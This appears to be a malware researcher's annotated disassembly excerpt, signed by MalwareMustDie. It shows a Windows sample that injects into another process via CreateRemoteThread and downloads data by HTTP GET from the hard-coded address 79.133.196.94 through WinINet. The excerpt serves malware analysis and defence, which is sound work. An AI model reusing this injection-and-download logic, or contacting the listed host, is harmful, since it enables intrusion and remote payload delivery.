  521. 0x40937B    call dword ptr [0x40C158h]  "GetModuleHandleW@KERNEL32.DLL" (Import, 1 Params)
  522. 0x409381    push eax   
  523. 0x409382    call dword ptr [0x40C0E8h]  "GetProcAddress@KERNEL32.DLL" (Import, 2 Params)
  524. 0x409388    push eax   
  525. 0x409389    push ebx   
  526. 0x40938A    push ebx   
  527. 0x40938B    push edi   
  528. 0x40938C    call dword ptr [0x40C0D0h]  "CreateRemoteThread@KERNEL32.DLL" (Import, 7 Params) // <<== here here!
  529. 0x409392    mov dword ptr [ebp+08h], eax   
  530. 0x409395    call esi    GetLastError@KERNEL32.DLL (Import, Unknown Params)
  531. 0x409397    mov esi, dword ptr [0x40C130h]  CloseHandle@KERNEL32.DLL (Import, 1 Params)
  532.  
  533.  
  534. // Downloading via WININET.DLL...
  535.  
  536. 0040A4CA    call dword ptr [0040C268h]  "InternetConnectA@WININET.DLL" (Import, 8 Params)
  537. 0040A4D0    mov dword ptr [ebp-18h], eax   
  538. 0040A4D3    cmp eax, ebx   
  539. 0040A4D5    je 0040A610h    target: 0040A610
  540. 0040A4DB    push esi    ASCII "79.133.196.94"
  541. 0040A4DC    push 00000001h 
  542. 0040A4DE    push 00400000h 
  543. 0040A4E3    push ebx   
  544. 0040A4E4    push ebx   
  545. 0040A4E5    push ebx   
  546. 0040A4E6    push dword ptr [ebp+10h]   
  547. 0040A4E9    push 00410A4Ch  ASCII "GET"
  548. 0040A4EE    push eax   
  549. 0040A4EF    call dword ptr [0040C278h]  "HttpOpenRequestA@WININET.DLL" (Import, 8 Params)
  550. 0040A4F5    mov esi, eax   
  551. 0040A4F7    mov dword ptr [ebp+08h], esi   
  552. 0040A4FA    cmp esi, ebx   
  553. 0040A4FC    je 0040A602h    target: 0040A602
  554. 0040A502    push dword ptr [ebp+14h]   
  555. 0040A505    lea eax, dword ptr [ebp-00000118h] 
  556. 0040A50B    push 00410A50h  ASCII "Host: %s"
  557. 0040A510    push eax   
  558. 0040A511    call dword ptr [0040C2E0h]  sprintf@MSVCRT.DLL (Import, 0 Params)
  559. 0040A517    add esp, 0Ch   
  560. 0040A51A    push A0000000h 
  561. 0040A51F    push FFFFFFFFh 
  562. 0040A521    lea eax, dword ptr [ebp-00000118h] 
  563. 0040A527    push eax   
  564. 0040A528    push esi   
  565. 0040A529    call dword ptr [0040C27Ch]  "HttpAddRequestHeadersA@WININET.DLL" (Import, 4 Params)
  566. 0040A52F    test eax, eax  
  567. 0040A531    je 0040A5F4h    target: 0040A5F4
  568. 0040A537    push ebx   
  569. 0040A538    push ebx   
  570. 0040A539    push ebx   
  571. 0040A53A    push ebx   
  572. 0040A53B    push esi   
  573. 0040A53C    call dword ptr [0040C274h]  "HttpSendRequestW@WININET.DLL" (Import, 5 Params)
  574. 0040A542    test al, al
  575. 0040A544    je 0040A5F0h    target: 0040A5F0
  576. 0040A54A    mov esi, 00000082h 
  577. 0040A54F    push esi   
  578. 0040A550    call dword ptr [0040C2E8h]  malloc@MSVCRT.DLL (Import, 0 Params)
  579. 0040A556    push esi   
  580. 0040A557    push ebx   
  581. 0040A558    push eax   
  582. 0040A559    mov dword ptr [ebp+10h], eax   
  583. 0040A55C    mov dword ptr [edi], eax   
  584. 0040A55E    call 0040B208h  memset@MSVCRT.DLL (Import, 0 Params) target: 0040B208
  585. 0040A563    add esp, 10h   
  586. 0040A566    push ebx    xref: 0040A5D5
  587. 0040A567    push ebx   
  588. 0040A568    lea eax, dword ptr [ebp-10h]   
  589. 0040A56B    push eax   
  590. 0040A56C    push dword ptr [ebp+08h]   
  591. 0040A56F    call dword ptr [0040C26Ch]  "InternetQueryDataAvailable@WININET.DLL" (Import, 4 Params)
  592. 0040A575    test eax, eax  
  593. 0040A577    je 0040A5E3h    target: 0040A5E3
  594. 0040A579    cmp dword ptr [ebp-10h], ebx   
  595. 0040A57C    je 0040A5E3h    target: 0040A5E3
  596. 0040A57E    push dword ptr [ebp-10h]   
  597. 0040A581    call dword ptr [0040C2E8h]  malloc@MSVCRT.DLL (Import, 0 Params)
  598. 0040A587    pop ecx
  599. 0040A588    lea ecx, dword ptr [ebp-0Ch]   
  600. 0040A58B    push ecx   
  601. 0040A58C    push dword ptr [ebp-10h]   
  602. 0040A58F    mov dword ptr [ebp+0Ch], eax   
  603. 0040A592    push eax   
  604. 0040A593    push dword ptr [ebp+08h]   
  605. 0040A596    call dword ptr [0040C270h]  "InternetReadFile@WININET.DLL" (Import, 4 Params)
  606. 0040A59C    test eax, eax  
  607. 0040A59E    je 0040A5D9h    target: 0040A5D9
  608. 0040A5A0    cmp dword ptr [ebp-0Ch], ebx   
  609. 0040A5A3    je 0040A5D9h    target: 0040A5D9
  610. 0040A5A5    mov eax, dword ptr [ebp-08h]   
  611. 0040A5A8    mov edi, esi   
  612. 0040A5AA    sub edi, eax   
  613. 0040A5AC    cmp dword ptr [ebp-0Ch], edi   
  614. 0040A5AF    jnc 0040A5B4h   target: 0040A5B4
  615. 0040A5B1    mov edi, dword ptr [ebp-0Ch]   
  616. 0040A5B4    mov ecx, dword ptr [ebp+10h]    xref: 0040A5AF
  617. 0040A5B7    push edi   
  618. 0040A5B8    push dword ptr [ebp+0Ch]   
  619. 0040A5BB    add ecx, eax   
  620. 0040A5BD    push ecx
  621. [...]
  622.  
  623. ------
  624. #MalwareMustDie!
  625. "Thou shalt not make malware Botnet!"